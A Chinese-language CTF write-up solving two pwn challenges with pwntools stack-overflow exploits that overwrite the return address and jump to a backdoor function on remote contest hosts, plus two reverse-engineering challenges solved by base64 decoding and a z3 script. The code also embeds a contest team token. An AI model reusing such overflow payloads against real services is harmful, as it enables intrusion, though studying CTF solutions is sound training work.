pwn-login

登录功能:随便输入一段较长的字符串 fuzz 一下,服务端会崩溃并把 core 数据发送回来;接收后保存到本地,从中可以得到可执行文件用于离线分析。

image-20240506164733093

程序带有后门函数,密码输入处存在栈溢出:填充 0x98 字节覆盖到保存的返回地址,再跳到后门函数即可(脚本跳到 backdoor+5,推测是跳过函数序言的 push rbp 以保持栈对齐,需结合反汇编确认)。

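import base64
import os
import sys
from ctypes import *

from pwn import *
from pwn import u64, u32, p64, p32
from libcfind import *
from LibcSearcher import *

context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]

# Contest credentials / target.  The token is a per-team secret: prefer the
# environment so it is not committed with the script nor echoed by the debug
# log; the literal fallback keeps the original behaviour when the variable is
# unset.
TOKEN = os.environ.get(
    'CTF_TOKEN',
    '557:MEYCIQC2WA6edSSGVo8AOQCj3TXXSSM3owCagj6bHEkuZWg7CAIhAMi6iZUaOsH2KoK-UTxeC00-TSWHvE-3uXF33KxmiGq2',
)
HOST, PORT = 'prob04.contest.pku.edu.cn', 10004

# Address of the backdoor function inside ./pwn.  A fixed address implies the
# binary is non-PIE — confirm with checksec before reusing.
backdoor = 0x401276
# Bytes from the start of the password buffer up to the saved return address.
RET_OFFSET = 0x98

debug = 0
if debug:
    p = process('./pwn')
    elf = ELF('./pwn')
    # Call gdb.attach(p) here when stepping through the overflow locally.
else:
    p = remote(HOST, PORT)

# ---- thin I/O helpers over the pwntools tube --------------------------------
s = lambda data: p.send(data)
sa = lambda text, data: p.sendafter(text, data)
sl = lambda data: p.sendline(data)
sla = lambda text, data: p.sendlineafter(text, data)
r = lambda num=4096: p.recv(num)
rl = lambda text: p.recvuntil(text)
pr = lambda num=4096: sys.stdout.write(p.recv(num).decode())
inter = lambda: p.interactive()
l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00'))
uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00'))
int16 = lambda data: int(data, 16)
lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
# -----------------------------------------------------------------------------

# Byte run the author observed at the end of the core image the service
# streams back after "Core dumped"; used as the terminator when saving it.
CORE_END_MARKER = (
    b'\x00' * 12 + b'\x5b' + b'\x38' + b'\x00' * 6 + b'\x1f' + b'\x01'
    + b'\x00' * 14 + b'\x01' + b'\x00' * 15
)


def dump_core(path='core'):
    """Save the core image the service sends back after a crashing login.

    One-off recon step used to obtain the binary for offline analysis; it is
    not part of the exploit path and is never called by default.  Assumes the
    token has already been submitted on the current tube.
    """
    rl("Username: ")
    sl('admin')
    rl("Password: ")
    sl('1q2w3e4r')
    rl("Core dumped\n")
    core = p.recvuntil(CORE_END_MARKER)
    # Binary mode: the core is raw bytes, not text.
    with open(path, 'wb') as f:
        f.write(core)


# ---- exploit ----------------------------------------------------------------
rl("Please input your token: ")
sl(TOKEN)

rl("Username: ")
sl('admin')
rl("Password: ")
# Fill the buffer up to the saved return address and redirect execution into
# the backdoor.  The +5 most likely skips the prologue (endbr64; push rbp) so
# the stack stays 16-byte aligned for the libc call inside the backdoor —
# TODO confirm against the disassembly.
payload = b'\x00' * RET_OFFSET + p64(backdoor + 5)
sl(payload)

inter()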

image-20240506164812435

pwn-easypwn

image-20240506095828812

第二处输入存在栈溢出:在密码字符串后加 '\x00' 截断字符串比较,后面的字节继续覆盖栈直到返回地址(偏移 0x38),跳转到后门函数 0x401177 即可。

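import base64
import os
import sys
from ctypes import *

from pwn import *
from pwn import u64, u32, p64, p32
from libcfind import *
from LibcSearcher import *

context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]

# Contest credentials / target.  The token is a per-team secret: prefer the
# environment so it is not committed with the script nor echoed by the debug
# log; the literal fallback keeps the original behaviour when the variable is
# unset.
TOKEN = os.environ.get(
    'CTF_TOKEN',
    '557:MEYCIQC2WA6edSSGVo8AOQCj3TXXSSM3owCagj6bHEkuZWg7CAIhAMi6iZUaOsH2KoK-UTxeC00-TSWHvE-3uXF33KxmiGq2',
)
HOST, PORT = 'prob07.contest.pku.edu.cn', 10007

# Address of the backdoor function inside ./pwn.  A fixed address implies the
# binary is non-PIE — confirm with checksec before reusing.
BACKDOOR = 0x401177
# Bytes from the start of the password buffer up to the saved return address.
RET_OFFSET = 0x38

debug = 0
if debug:
    p = process('./pwn')
    # Call gdb.attach(p) here when stepping through the overflow locally.
else:
    p = remote(HOST, PORT)
# ELF is loaded in both modes (the remote path needs ./pwn present locally).
elf = ELF('./pwn')

# ---- thin I/O helpers over the pwntools tube --------------------------------
s = lambda data: p.send(data)
sa = lambda text, data: p.sendafter(text, data)
sl = lambda data: p.sendline(data)
sla = lambda text, data: p.sendlineafter(text, data)
r = lambda num=4096: p.recv(num)
rl = lambda text: p.recvuntil(text)
pr = lambda num=4096: sys.stdout.write(p.recv(num).decode())
inter = lambda: p.interactive()
l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00'))
uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00'))
int16 = lambda data: int(data, 16)
lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
# -----------------------------------------------------------------------------

# ---- exploit ----------------------------------------------------------------
rl("Please input your token: ")
sl(TOKEN)

rl("Enter your username: ")
sl(b'root\x00')
rl("Enter the password: ")
# The password string is NUL-terminated so a C-string comparison only sees the
# expected prefix, while the raw read keeps copying the rest of the payload past
# the buffer up to the saved return address (the "\x00 truncation" trick).
# Verify the compare/read logic in the binary before reusing the offset.
payload = b'!@#$%^&*()_+\x00'.ljust(RET_OFFSET, b'\x00') + p64(BACKDOOR)
# Raw send(): the payload is delivered exactly as built, with no trailing newline.
s(payload)

inter()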

image-20240506095940700

re-easyre

image-20240506095553980

换表的base64编码。

image-20240506095651479

解码一下就行

flag{B4se64_1s_s0_e4sy}

re-babyre

有UPX壳,用upx.exe -d babyre脱壳

image-20240506195542350

四个part,对应的变换过程,Z3列公式就能直接解

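from z3 import *


def _solve_part(constraint, upper_bound=None):
    """Solve one 32-bit flag part with z3.

    ``constraint`` is a callable taking the z3 BitVec ``a1`` and returning the
    equation lifted from the decompiled check.  ``upper_bound`` adds the
    ``a1 <= upper_bound`` pruning the author needed so the solver picks the
    intended root rather than some other satisfying value.

    NOTE(review): ``<=`` on a z3 BitVec is a *signed* comparison (``ULE`` is
    the unsigned one), so the bound also admits values with the top bit set;
    the returned value should still be checked against the binary.

    Returns the model value as an int, or ``None`` when the equation is unsat.
    """
    a1 = BitVec('a1', 32)
    s = Solver()
    if upper_bound is not None:
        s.add(a1 <= upper_bound)
    s.add(constraint(a1))
    if s.check() != sat:
        return None
    return s.model()[a1].as_long()


def solve_a1():
    """``v6``: second part.  Original entry point, kept for any caller."""
    return _solve_part(
        lambda a1: (a1 | 0x8E03BEC3) == (3 * (a1 & 0x71FC413C) - a1 - 1876131848)
    )


def solve_v7():
    """``v7``: third part (presumably, by the order the script reports them)."""
    return _solve_part(
        lambda a1: 4 * ((~a1 & 0xA8453437) + 2 * ~(~a1 | 0xA8453437))
        + -3 * (~a1 | 0xA8453437)
        + 3 * ~(a1 | 0xA8453437)
        - (-10 * (a1 & 0xA8453437)
           + (a1 ^ 0xA8453437)) == 551387557,
        upper_bound=0x10000000,
    )


def solve_v8():
    """``v8``: fourth part (presumably, by the order the script reports them)."""
    return _solve_part(
        lambda a1: 11 * ~(a1 ^ 0xE33B67BD)
        + 4 * ~(~a1 | 0xE33B67BD)
        - (6 * (a1 & 0xE33B67BD)
           + 12 * ~(a1 | 0xE33B67BD))
        + 3 * (a1 & 0xD2C7FC0C)
        + -5 * a1
        - 2 * ~(a1 | 0xD2C7FC0C)
        + ~(a1 | 0x2D3803F3)
        + 4 * (a1 & 0x2D3803F3)
        - -2 * (a1 | 0x2D3803F3) == -837785892,
        upper_bound=0x10000000,
    )


def _report(label, value):
    """Print a part in hex (the form it takes in the flag) or note it is unsat.

    Every part is printed in hex so no manual decimal->hex conversion is needed
    before substituting the value into the flag.
    """
    if value is None:
        print(label, '= No solution found')
    else:
        print(label, '=', hex(value))


if __name__ == '__main__':
    # Part 1 is a plain constant fold in the binary; the rest need the solver.
    _report('v5', 907301700 + 2914111512)
    _report('v6', solve_a1())
    _report('v7', solve_v7())
    _report('v8', solve_v8())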

4ec70d26c0d0e298ae5ebbc2f2b6b48

替换对应part即可

flag{e3c6235c-05d9434d-04b1edf3-04034083}